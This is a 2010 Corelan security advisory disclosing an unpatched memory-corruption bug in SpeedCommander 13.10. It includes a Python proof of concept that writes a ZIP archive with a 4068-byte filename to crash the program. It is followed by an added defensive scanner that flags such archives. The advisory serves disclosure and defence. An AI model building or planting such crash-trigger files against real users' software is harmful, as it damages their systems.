|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                      http://www.corelan.be:8800  |
|                                         security@corelan.be      |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory : CORELAN-10-028
Disclosure date : April 20th, 2010
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028

00 : Vulnerability information

  Product : SpeedCommander
  Version : 13.10 (latest version)
  Vendor : SpeedProject
  URL : http://www.speedproject.de
  Platform : Windows
  Type of vulnerability : Memory Corruption
  Risk rating : Med
  Issue fixed in version : not fixed
  Vulnerability discovered by : TecR0c
  Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/

01 : Vendor description of software

  "The SpeedCommander application was designed to be a comfortable file manager. It builds on the proven two window technology and offers a multitude of exclusive features. Sort, copy, move or delete your files either using the keyboard or the mouse."

02 : Vulnerability details

  The application mishandles an overly long filename stored inside a zip archive, which an attacker can use in a manner other than the designer intended. Opening such an archive corrupts memory and ends with the error "SpeedCommander.exe encountered a problem in module CxZip61u.dll and needs to close."
03 : Author/Vendor communication

  March 31st, 2010 : author contacted
  April 9th, 2010 : sent reminder
  April 20th, 2010 : no response, public disclosure

04 : Proof of Concept

#!/usr/bin/python
# #######################################################################
# Title: Speed Commander 13.10 (.zip) Memory Corruption
# Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c
# Found by: TecR0c
# Download: http://www.sp-download.de/sc13/sc13.exe
# Platform: Windows XP sp3 En
# Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Trigger : Open the application, browse to the zip file > double click = BOOM!
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                      http://www.corelan.be:8800  |"
print "|                                         security@corelan.be      |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] SpeedCommander (.zip) - by TecR0c"

# ZIP local file header (signature PK\x03\x04)
ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
              "\x00\x00\x00\x00\x00\x00\x00\x00"
              "\xe4\x0f"
              "\x00\x00\x00")

# ZIP central directory file header (signature PK\x01\x02);
# 0x0fe4 = 4068 is the filename length it declares for the single entry
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
              "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
              "\xe4\x0f"
              "\x00\x00\x00\x00\x00\x00\x01\x00"
              "\x24\x00\x00\x00\x00\x00\x00\x00")

# End of central directory record (signature PK\x05\x06): one entry,
# central directory size 0x1012 at offset 0x1002
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
                 "\x12\x10\x00\x00"
                 "\x02\x10\x00\x00"
                 "\x00\x00")

# The overly long filename: 4064 'A's followed by ".txt" (4068 bytes in total)
buff = "\x41" * 4064
buff += ".txt"

# Write the crafted archive in binary mode so no byte is translated on Windows
mefile = open('SpeedCommander.zip', 'wb')
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header)
mefile.close()
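A defensive counterpart to the PoC, added here as an example and not part of the advisory or of SpeedProject's code: a scanner that walks a ZIP's central directory the way an unpacker must and flags entries whose declared filename length exceeds a bound, runs past the end of the file, or disagrees with the local file header, so an archive like the one built above is rejected before its name is handed to the archive library. The build_zip helper, the scan_zip function and the 260-byte bound (Windows MAX_PATH) are assumptions of this example, and the archives it scans are constructed inline.

```python
import struct

# Signatures and little-endian layouts of the three ZIP records the PoC above hand-builds
EOCD_SIG, CDH_SIG, LFH_SIG = b"PK\x05\x06", b"PK\x01\x02", b"PK\x03\x04"
EOCD_FMT = "<4sHHHHIIH"          # sig, disk, cd disk, entries on disk, entries total, cd size, cd offset, comment len
CDH_FMT = "<4sHHHHHHIIIHHHHHII"  # sig, versions, flags, method, time, date, crc, sizes, name len [10], extra, comment, disk, attrs, lfh offset [16]
LFH_FMT = "<4sHHHHHIIIHH"        # sig, version, flags, method, time, date, crc, sizes, name len [9], extra len


def build_zip(name, lfh_name_len=None):
    """Constructed sample: a one-entry, empty, stored ZIP for the given filename (bytes).
    lfh_name_len lets a test make the local header disagree with the central directory."""
    n = len(name) if lfh_name_len is None else lfh_name_len
    lfh = struct.pack(LFH_FMT, LFH_SIG, 20, 0, 0, 0, 0, 0, 0, 0, n, 0) + name
    cdh = struct.pack(CDH_FMT, CDH_SIG, 20, 20, 0, 0, 0, 0, 0, 0, 0, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack(EOCD_FMT, EOCD_SIG, 0, 0, 1, 1, len(cdh), len(lfh), 0)
    return lfh + cdh + eocd


def scan_zip(data, max_name_len=260):
    """Walk the central directory and return one dict per entry; 'flags' lists the reasons
    an entry looks hostile (an empty list means the entry passed every check)."""
    eocd_at = data.rfind(EOCD_SIG)
    if eocd_at < 0:
        raise ValueError("no end-of-central-directory record")
    eocd = struct.unpack_from(EOCD_FMT, data, eocd_at)
    entries, pos, results = eocd[4], eocd[6], []
    for _ in range(entries):
        if data[pos:pos + 4] != CDH_SIG or pos + 46 > len(data):
            raise ValueError("central directory header missing at offset %d" % pos)
        cdh = struct.unpack_from(CDH_FMT, data, pos)
        name_len, extra_len, comment_len, lfh_off = cdh[10], cdh[11], cdh[12], cdh[16]
        name = data[pos + 46:pos + 46 + name_len]
        flags = []
        if name_len > max_name_len:      # 260 = Windows MAX_PATH; tune per deployment
            flags.append("name_len %d exceeds %d" % (name_len, max_name_len))
        if len(name) != name_len:        # declared length runs past the end of the file
            flags.append("name truncated by end of file")
        if data[lfh_off:lfh_off + 4] != LFH_SIG or lfh_off + 30 > len(data):
            flags.append("lfh offset does not point at a local file header")
        else:                            # both headers carry a length; an unpacker trusting one can be lied to by the other
            lfh_name_len = struct.unpack_from(LFH_FMT, data, lfh_off)[9]
            if lfh_name_len != name_len:
                flags.append("local header name_len %d disagrees with central directory" % lfh_name_len)
        results.append({"offset": pos, "name": name, "name_len": name_len, "flags": flags})
        pos += 46 + name_len + extra_len + comment_len
    return results
```

Running scan_zip over build_zip(b"A" * 4064 + b".txt") reports a single entry with name_len 4068 and the flag "name_len 4068 exceeds 260", while a 10-byte name passes with no flags.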